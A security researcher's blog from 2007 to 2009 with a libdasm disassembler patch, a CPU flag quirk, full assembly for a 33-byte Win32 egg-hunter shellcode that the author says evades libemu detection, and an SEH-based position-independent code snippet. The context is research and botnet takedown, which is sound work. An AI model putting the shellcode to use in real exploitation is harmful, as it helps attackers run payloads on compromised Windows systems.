Malware Activity

2009-05-08

libdasm @ Google Code

Since `jt' apparently no longer has the time or inclination to maintain libdasm, Ange Albertini has taken over the task and created a new Google Code project for maintaining it (libdasm was public domain anyway). My recent FPU fix is already included, and I will try to get people like Silvio Cesare to add their fixes and patches as well. Thanks, Ange, for stepping forward!


2009-04-10

libdasm D9h FPU Instructions Fix

libdasm incorrectly disassembles FPU instructions with the D9 prefix and a second byte greater than that of fnop. Affected instructions include, among others, fsin, fcos and frndint. The reason is simple: four NULL lines are missing in the corresponding opcode table, resulting in an off-by-four for the following opcodes. I've sent a very simple patch to the libdasm author; until it is included in a release, it's here as well:

$ cat libdasm-1.5-fpufix-d9prefix.patch 
--- libdasm-1.5/opcode_tables.h 2006-02-21 15:29:41.000000000 +0100
+++ libdasm-1.5-fpufix/opcode_tables.h 2009-04-10 13:32:20.000000000 +0200
@@ -1818,6 +1818,10 @@
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
  { INSTRUCTION_TYPE_FPU,    "fchs",      FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 },
  { INSTRUCTION_TYPE_FPU,    "fabs",      FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 },
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
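
The effect of the four missing rows can be illustrated with a toy lookup table. This is only a sketch: the mnemonics follow the x86 D9 encoding, but the table layout (one row per second byte, starting at D0) and the names `CORRECT`, `BROKEN` and `lookup` are assumptions for illustration and are not taken from libdasm.

```python
# Toy model of a D9 opcode table, indexed by (second_byte - 0xD0).
# The layout is an assumption for illustration, not libdasm's real structure.
CORRECT = (
    ["fnop"] + [None] * 15                                            # D0, D1..DF
    + ["fchs", "fabs", None, None, "ftst", "fxam", None, None]        # E0..E7
    + ["fld1", "fldl2t", "fldl2e", "fldpi",
       "fldlg2", "fldln2", "fldz", None]                              # E8..EF
    + ["f2xm1", "fyl2x", "fptan", "fpatan",
       "fxtract", "fprem1", "fdecstp", "fincstp"]                     # F0..F7
    + ["fprem", "fyl2xp1", "fsqrt", "fsincos",
       "frndint", "fscale", "fsin", "fcos"]                           # F8..FF
)

# Drop four of the empty rows after fnop to mimic the missing NULL lines.
BROKEN = CORRECT[:1] + CORRECT[5:]


def lookup(table, second_byte):
    """Return the mnemonic for D9 <second_byte>, or None if there is no row."""
    index = second_byte - 0xD0
    return table[index] if index < len(table) else None


for byte in (0xD0, 0xE0, 0xFA):
    print(hex(byte), lookup(CORRECT, byte), lookup(BROKEN, byte))
```

In this model fnop still decodes correctly, while every later opcode picks up the row that belongs four bytes further on, and the last four opcodes fall off the end of the table.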

I stumbled across this while trying to use my (pefile- and pydasm-based) code normalizer on a malware packer that uses floats for looping.


2009-02-18

Win32 Egg Search Shellcode, 33 bytes

For a current collaboration on taking down yet another botnet, I had to write a very small shellcode. Thanks to some ideas from Understanding Windows Shellcode by skape, I managed to write an egg search shellcode in 33 bytes.

The general idea of the AddAtomA int 2e memory testing was public, but the best implementation I could find was 40 bytes long (skape's one) and had the limitation of an executable marker. This one is 33 bytes long and you can choose any four-byte marker you want. If we didn't start at 0, we could save two more bytes and get down to 31, but this would make the search a lot slower. There is a 32-byte version by skape that requires a page-aligned second stage, which is not really comparable because it again requires an executable marker and a second-stage injection of at least 4 KB with a long marker sled. Still, I first got the int 2e idea from his paper, so credits to him for that.

The only real limitation of this shellcode is that your second stage may not start within the first four bytes of a page. The theoretical probability of that is < 0.1%; with heap allocator designs in mind, it is even less probable.
If this is a severe stability limitation for you, there are two solutions:

  1. Use an executable marker and put it in front of the shellcode twice. Usually, it will trigger in the first four bytes and jump into the second marker. If it really is page aligned, it will jump right after the second marker.
  2. Use any (non-executable) marker and put a second marker with a relative jump to your shellcode after the shellcode.
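
The < 0.1% figure can be reproduced with a few lines of arithmetic. This is a sketch under the assumption that the start address of the second stage is uniformly distributed over all offsets of a 4096-byte page; the helper name `skipped` is made up for illustration.

```python
PAGE_SIZE = 4096


def skipped(address):
    """Mirror `test dx, 0x0ffc` / `jz`: true if the address is skipped."""
    return (address & 0x0FFC) == 0


# Offsets within one page that the search never examines.
skipped_offsets = [off for off in range(PAGE_SIZE) if skipped(off)]

# Assumption: every page offset is equally likely as a start address.
probability = len(skipped_offsets) / PAGE_SIZE

print(skipped_offsets, "{:.4%}".format(probability))
```

Only the offsets 0 to 3 are skipped, so the chance is 4 in 4096, which is just under 0.1%.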

This shellcode is 100% position independent without any GetPC sequence, so it won't be detected by libemu and similar tools (although this wasn't a design goal but just a side effect). The second stage shellcode can also be implemented without any GetPC sequence, as it gets its own address passed in edx.

There is a weird inc ebx instruction at the end of the shellcode, but for a good reason: If this eggsearch shellcode lies in memory before the actual shellcode, our search will stop at the imm32 of the cmp r/m32, imm32 instruction and the jmp edx will go to the next instruction, jne (= jnz) address_loop. The inc ebx ensures that ZF is not set (unless we're very unlucky and our exploitation environment had the otherwise unused ebx register set to 0xffffffff) and thus our search continues at the next address.
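
The flag argument can be checked with a tiny model of a 32-bit inc. This is a sketch only; `inc32` is a hypothetical helper that models nothing but the result and the zero flag.

```python
def inc32(value):
    """Return (result, zf) for a 32-bit `inc`, modelling only the zero flag."""
    result = (value + 1) & 0xFFFFFFFF
    return result, result == 0


# ZF ends up set only when the register wraps around from 0xffffffff to 0.
for ebx in (0x00000000, 0x7FFFFFFF, 0xFFFFFFFE, 0xFFFFFFFF):
    print(hex(ebx), inc32(ebx))
```

For every starting value other than 0xffffffff the zero flag is clear, so the jne that follows a false match is taken and the search continues.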

; win32 eggsearch shellcode, 33 bytes
; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3
; (c) 2009 by Georg 'oxff' Wicherski 

[bits 32]

marker equ 0x1f217767   ; 'gw!\x1f'

start:
 xor edx, edx   ; edx = 0, pointer to examined address
      
address_loop:
 inc edx    ; edx++, try next address

pagestart_check:
 test dx, 0x0ffc   ; are we within the first 4 bytes of a page?
 jz address_loop   ; if so, try next address as previous page might be unreadable
     ; and the cmp [edx-4], marker might result in a segmentation fault

access_check:
 push edx   ; save across syscall
 push byte 8   ; eax = 8, syscall nr of AddAtomA
 pop eax    ; ^
 int 0x2e   ; fire syscall (eax = 8, edx = ptr)
 cmp al, 0x05   ; is result 0xc0000005? (a bit sloppy)
 pop edx    ;

 je address_loop   ; jmp if result was 0xc0000005

egg_check:
 cmp dword [edx-4], marker ; is our egg right before examined address?
 jne address_loop  ; if not, try next address

egg_execute:
 inc ebx    ; make sure, zf is not set
 jmp edx    ; we found our egg at [edx-4], so we can jmp to edx
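
The control flow of the listing can be followed more easily in a high-level model. The following is a rough sketch, not a port. Memory is modelled as a dictionary of readable pages, and the int 2e probe is replaced by a dictionary lookup. An explicit `limit` stops the loop, which the shellcode does not have. The names `egg_search`, `pages` and `limit` are assumptions for illustration.

```python
import struct

PAGE_SIZE = 4096
MARKER = struct.pack("<I", 0x1F217767)  # same value as `marker` in the listing


def egg_search(pages, limit):
    """Return the address right after the marker, or None if none is found.

    pages maps page base addresses to PAGE_SIZE bytes of readable memory;
    any address outside these pages counts as unreadable.
    """
    edx = 0
    while edx < limit:
        edx += 1                          # inc edx
        if (edx & 0x0FFC) == 0:           # test dx, 0x0ffc / jz address_loop
            continue
        base = edx & ~(PAGE_SIZE - 1)
        if base not in pages:             # stands in for the int 2e probe
            continue
        offset = edx - base               # offset >= 4, so edx-4 is on this page
        if pages[base][offset - 4:offset] == MARKER:
            return edx                    # jmp edx
    return None


# Usage: one readable page at 0x10000 with the marker at offset 0x100.
page = bytearray(PAGE_SIZE)
page[0x100:0x104] = MARKER
found = egg_search({0x10000: bytes(page)}, limit=0x20000)
print(hex(found))
```

The model returns the address directly behind the marker, which is where the second stage would start and what the shellcode passes on in edx.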


2007-09-27

REP(N)Z and the EFLAGS

While working on some debugger-like automation code for EmsiSoft, I recently discovered a funny property when single-stepping REPNZ-prefixed SCAS and CMPS instructions with the TF bit set in EFLAGS. As expected, a debug event occurs for each single byte / word / doubleword. However, the status bits of the EFLAGS register (e.g. ZF) are not correct for any iteration except the last one.

I tested this on Windows XP in a VMware virtual machine and haven't had the time to reproduce it on a physical machine yet. Let me know if you run into this quirk, too.


2007-02-23

Get EIP with SEH

While talking about shellcode detection with Paul and Markus, I remembered some SEH-based code I had written some time ago to make a piece of code position independent (and obfuscated). Unfortunately, I couldn't find the original source anymore, so I wrote up what I remembered (and didn't test it):

Snippet 1: Custom Handler

mov eax, [esp+0x10]
mov eax, [eax+0x0c]
push eax
jmp eax

Snippet 2: SEH Overwrite

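mov edi, [fs:0]                 ; edi = top-most SEH registration record
mov edi, [edi+4]                ; edi = address of its handler
mov dword [edi+0], 0x448b6766   ; overwrite the handler with snippet 1
mov dword [edi+4], 0x67661024
mov dword [edi+8], 0x660c408b
mov dword [edi+12], 0xe0ff6650
 
xor eax, eax                    ; eax = 0
xor [eax], eax                  ; access address 0 to raise an exception
 
pop eax                         ; fetch the address pushed by the handler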

Basically, the second snippet fetches the address of the current top-most SEH handler, overwrites it with the binary version of the first snippet and triggers an access violation by accessing address 0. The address is then popped. Of course, this only works on Win32.
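
To see which bytes the four immediates of the second snippet actually write, they can be unpacked as little-endian dwords. This is a small sketch; `DWORDS` and `handler_bytes` are names chosen here for illustration.

```python
import struct

# The four immediates from the SEH overwrite snippet, in the order written.
DWORDS = [0x448B6766, 0x67661024, 0x660C408B, 0xE0FF6650]

# x86 stores dwords little-endian, so pack each one with "<I".
handler_bytes = b"".join(struct.pack("<I", d) for d in DWORDS)

print(" ".join("{:02x}".format(b) for b in handler_bytes))
```

The resulting 16 bytes contain the opcodes 8b 44 24 10, 8b 40 0c, 50 and ff e0 of the first snippet, each preceded by 0x66 and/or 0x67 size-override prefixes. That may mean the bytes were assembled in 16-bit mode. Since the code is untested anyway, it would probably be wise to re-assemble the handler with [bits 32] before relying on these constants.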

At the time I `invented' that code, I didn't have any reference for such code in the wild. But I'm pretty sure I'm not the first one to have had that idea (although a quick Google search didn't reveal anything to me).
